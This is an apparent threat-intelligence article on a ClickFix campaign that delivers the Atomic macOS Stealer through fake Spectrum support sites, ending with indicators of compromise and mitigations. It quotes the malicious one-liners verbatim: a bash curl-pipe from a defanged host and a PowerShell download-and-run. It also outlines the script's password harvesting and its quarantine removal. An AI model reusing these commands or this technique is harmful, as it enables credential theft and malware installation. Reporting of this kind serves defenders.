Security researchers have uncovered a new campaign leveraging a variant of the Atomic macOS Stealer (AMOS), deploying a sophisticated blend of phishing and technical exploitation to target both consumer and corporate macOS users.
The campaign, first detected in early June 2025, uses typosquatted domains mimicking U.S. telecom provider Spectrum and exploits the Clickfix method a known social engineering tactic to deliver OS-specific payloads.


Technical Analysis: Multi-Platform Payloads and Native Abuse
The attackers set up fake Spectrum-themed websites, such as panel-spectrum[.]net and spectrum-ticket[.]net, to lure victims searching for legitimate customer support portals.
Upon visiting these sites, users are prompted to verify their identity via an “Alternative Verification” process.
Victims see a button that, when clicked, copies a command to their clipboard and displays instructions tailored to their detected operating system:
For macOS Users:
text/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)"
curl -fsSL <URL>downloads a script silently and follows redirects.- The script is executed immediately within Bash.
install.sh – Malicious Shell Script Breakdown:
- Password Harvesting:
- Retrieves the current user’s name:
username=$(whoami). - Prompts for the “System Password” in a loop.
- Validates the password using
dscl . -authonly. - Stores the captured password in
/tmp/.pass.
- Retrieves the current user’s name:
- Payload Download & Execution:
- Downloads the actual AMOS binary:
curl -o /tmp/update https://applemacios[.]com/getrur/update. - Removes macOS quarantine:
sudo -S xattr -c /tmp/update(using the stolen password). - Makes binary executable:
chmod +x /tmp/update. - Executes the malicious binary:
/tmp/update.
- Downloads the actual AMOS binary:
Key Security Evasion Tactics:
- Abuse of native macOS utilities (
dscl,sudo,xattr). - Immediate execution of downloaded binaries, helping bypass traditional antivirus and Endpoint Detection and Response (EDR) solutions.
- Use of legitimate-looking prompts and instructions to lower suspicion.
For Windows and Linux Users:
- The delivery site serves PowerShell or incorrect instructions (e.g., “Hold Windows Key + R” shown to all users), indicating haste in infrastructure setup.
powershellpowershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file"
Attribution, Indicators, and Infrastructure Flaws
Analysis of the campaign revealed Russian-language comments embedded in the delivery page source code, suggesting involvement of Russian-speaking cybercriminals.
The infrastructure is notably sloppy, with mismatched platform instructions and shared commands for disparate operating systems a tactic that may undermine the campaign’s stealth but enables rapid, wide deployment.
Key Indicators of Compromise (IOCs):
| Indicator Type | Value |
|---|---|
| Domains | panel-spectrum[.]net, spectrum-ticket[.]net, applemacios[.]com, cf-verifi.pages[.]dev |
| MD5 (AMOS binary) | eaedee8fc9fe336bcde021bf243e332a |
| URLs | https://applemacios[.]com/getrur/install.sh, https://applemacios[.]com/getrur/update |
| File Path | /tmp/update |
Impact and Mitigation Guidance
Risks to Organizations
- Credential Theft: Stolen macOS system passwords can be used to compromise enterprise VPNs, cloud accounts, and internal systems.
- Bypass of Security Tools: By abusing system commands and legitimate utilities, detection is significantly hindered.
- Potential for Lateral Movement and Ransomware: Credentials and persistent access pave the way for deeper intrusions, data theft, or ransomware deployment.
Defensive Best Practices
- User Awareness: Train staff to recognize social engineering, especially bogus “system verification” prompts.
- Endpoint Hardening: Enforce Gatekeeper, disallow unsigned scripts, and use Mobile Device Management (MDM) to lock down macOS systems.
- Threat Hunting: Actively monitor for suspicious password prompt loops, misuse of
dscl, and known AMOS IOCs. - Incident Response: Isolate affected endpoints and reset compromised credentials immediately.
The AMOS stealer’s use of Clickfix, native macOS commands, and hastily assembled typosquatting infrastructure highlights the escalating sophistication and opportunism in multi-platform social engineering.
Vigilant user education and proactive technical controls are vital to staying ahead of these fast-moving threats.





